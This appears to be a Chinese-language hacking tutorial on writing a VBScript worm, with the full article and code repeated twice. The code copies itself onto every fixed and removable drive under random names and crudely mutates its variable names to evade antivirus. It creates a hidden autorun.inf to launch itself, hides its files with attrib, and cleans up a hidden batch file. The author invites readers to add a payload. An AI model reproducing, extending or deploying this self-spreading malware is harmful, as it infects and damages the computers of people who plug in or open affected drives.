vbs之类蠕虫病毒的编写
文章标题之所以称为类蠕虫,是因为攻击代码 即主题代码还没实现
sub yitiaolong() '定义一条龙过程
on error resume next '这里是防止没有发现匹配设备时而报错
dim drivearray '初始化数组变量
dim drive '驱动器句柄变量
dim strarray '初始化字符串数组变量
dim vbcode '用于接收变异的自身代码
dim file
dim dirc '用于获取随机文件名
set fso=createobject("scripting.filesystemobject")
set objshell=createobject("wscript.shell")
drivearray=array("c:","d:","e:","f:","g:","h:") '定义一个数组,元素即为盘符,可自行增加
for i=0 to 5 '循环对比磁盘
set drive=fso.getdrive(drivearray(i)) '获取驱动器的句柄
if drive.drivetype=1 or drive.drivetype=2 then '等于1为可移动磁盘,2为固定硬盘
strarray=array("vbcode","objshell","fso","filehacker") '定义一个数组啦,用于存放要变化的字符
vbcode=fso.opentextfile(wscript.scriptfullname,1).readall '读取自身代码,并赋值给变量vbcode
for stri=0 to 3
vbcode=replace(vbcode,strarray(stri),chr((int)((rnd*22)+97))& chr((int)((rnd*22)+97))&chr((int)((rnd*22)+97))&chr((int) ((rnd*22)+97))) '用随机生成的字符取代数组离得字符
next
set file=fso.createtextfile(drivearray(i)+"\hack.txt") '如果发现移动硬盘或固定驱动器就往里面创建文件
file.writeline vbcode '往hack.txt里写入自身代码
file.close
dirc=chr((int)((rnd*22)+97))&chr((int)((rnd*22)+97))&chr((int)((rnd*22)+97))&chr((int)((rnd*22)+97)) '定义一个变量,赋值是随机的
set file=fso.getfile(drivearray(i)&"\hack.txt") '得到hack.txt的句柄
file.copy(drivearray(i)&"\"&dirc&".vbs") '复制自身为脚本文件,文件名是随机的
file.delete '删除hack.txt自身
set file=fso.createtextfile(drivearray(i)+"\autorun.txt") '在驱动器根目录里生成文本文件autorun.txt
file.writeline "[autorun]" '写入内容啦
file.writeline "open="&dirc&".vbs"
file.writeline "shell/open=打开(&0)"
file.writeline "shell/open/command="&dirc&".vbs"
file.writeline "shell/oth=资源管理器(&X)"
file.writeline "shell/oth/command="&dirc&".vbs"
file.close
set file=fso.getfile(drivearray(i)+"\autorun.txt") '这里不用说啦吧,获得句柄
file.copy(drivearray(i)+"\autorun.inf") '复制自身为autorun.inf
file.delete '删除自己
set file=fso.createtextfile(drivearray(i)+"\hack.txt") '在创建hack.txt文件
file.writeline "attrib +s +h +r "&drivearray(i)&"\autorun.inf"
file.writeline "attrib +s +h +r "&drivearray(i)&"\"&dirc&".vbs"
file.close
set file=fso.getfile(drivearray(i)+"\hack.txt")
file.copy(drivearray(i)+"\hack.bat")
file.delete
file=drivearray(i)+"\hack.bat"
objshell.run(file),vbhide '隐藏执行hack.bat文件
wscript.sleep 1000 '延时1秒再执行
objshell.run("cmd /c del "&file),vbhide '删除hack.bat
end if
next
set fso=nothing
set objshell=nothing '主要是释放内存空间,你还可以自行添加
end sub
这里已经实现自我复制,变量的自我修改,文件名的不同,autorun文件的自动生成和自我隐藏
后续的发展就要看读者啦,你的散发思维啦 , 加入攻击代码 ,就会是一个很好的VBS型的蠕虫啦
在这里先说下抱歉,文章中的自我变异免杀的功能不会很好,只能怪笔者能力有限啦,没能实现脚本的真正的自我变种
还说几句,在脚本方面,WMI 即windows管理规划,这里有强的功能,但我这方面还涉及很少啦,有机会大家一起交流啦!!!!
sub yitiaolong() '定义一条龙过程
on error resume next '这里是防止没有发现匹配设备时而报错
dim drivearray '初始化数组变量
dim drive '驱动器句柄变量
dim strarray '初始化字符串数组变量
dim vbcode '用于接收变异的自身代码
dim file
dim dirc '用于获取随机文件名
set fso=createobject("scripting.filesystemobject")
set objshell=createobject("wscript.shell")
drivearray=array("c:","d:","e:","f:","g:","h:") '定义一个数组,元素即为盘符,可自行增加
for i=0 to 5 '循环对比磁盘
set drive=fso.getdrive(drivearray(i)) '获取驱动器的句柄
if drive.drivetype=1 or drive.drivetype=2 then '等于1为可移动磁盘,2为固定硬盘
strarray=array("vbcode","objshell","fso","filehacker") '定义一个数组啦,用于存放要变化的字符
vbcode=fso.opentextfile(wscript.scriptfullname,1).readall '读取自身代码,并赋值给变量vbcode
for stri=0 to 3
vbcode=replace(vbcode,strarray(stri),chr((int)((rnd*22)+97))& chr((int)((rnd*22)+97))&chr((int)((rnd*22)+97))&chr((int) ((rnd*22)+97))) '用随机生成的字符取代数组离得字符
next
set file=fso.createtextfile(drivearray(i)+"\hack.txt") '如果发现移动硬盘或固定驱动器就往里面创建文件
file.writeline vbcode '往hack.txt里写入自身代码
file.close
dirc=chr((int)((rnd*22)+97))&chr((int)((rnd*22)+97))&chr((int)((rnd*22)+97))&chr((int)((rnd*22)+97)) '定义一个变量,赋值是随机的
set file=fso.getfile(drivearray(i)&"\hack.txt") '得到hack.txt的句柄
file.copy(drivearray(i)&"\"&dirc&".vbs") '复制自身为脚本文件,文件名是随机的
file.delete '删除hack.txt自身
set file=fso.createtextfile(drivearray(i)+"\autorun.txt") '在驱动器根目录里生成文本文件autorun.txt
file.writeline "[autorun]" '写入内容啦
file.writeline "open="&dirc&".vbs"
file.writeline "shell/open=打开(&0)"
file.writeline "shell/open/command="&dirc&".vbs"
file.writeline "shell/oth=资源管理器(&X)"
file.writeline "shell/oth/command="&dirc&".vbs"
file.close
set file=fso.getfile(drivearray(i)+"\autorun.txt") '这里不用说啦吧,获得句柄
file.copy(drivearray(i)+"\autorun.inf") '复制自身为autorun.inf
file.delete '删除自己
set file=fso.createtextfile(drivearray(i)+"\hack.txt") '在创建hack.txt文件
file.writeline "attrib +s +h +r "&drivearray(i)&"\autorun.inf"
file.writeline "attrib +s +h +r "&drivearray(i)&"\"&dirc&".vbs"
file.close
set file=fso.getfile(drivearray(i)+"\hack.txt")
file.copy(drivearray(i)+"\hack.bat")
file.delete
file=drivearray(i)+"\hack.bat"
objshell.run(file),vbhide '隐藏执行hack.bat文件
wscript.sleep 1000 '延时1秒再执行
objshell.run("cmd /c del "&file),vbhide '删除hack.bat
end if
next
set fso=nothing
set objshell=nothing '主要是释放内存空间,你还可以自行添加
end sub
这里已经实现自我复制,变量的自我修改,文件名的不同,autorun文件的自动生成和自我隐藏
后续的发展就要看读者啦,你的散发思维啦 , 加入攻击代码 ,就会是一个很好的VBS型的蠕虫啦
在这里先说下抱歉,文章中的自我变异免杀的功能不会很好,只能怪笔者能力有限啦,没能实现脚本的真正的自我变种
还说几句,在脚本方面,WMI 即windows管理规划,这里有强的功能,但我这方面还涉及很少啦,有机会大家一起交流啦!!!!
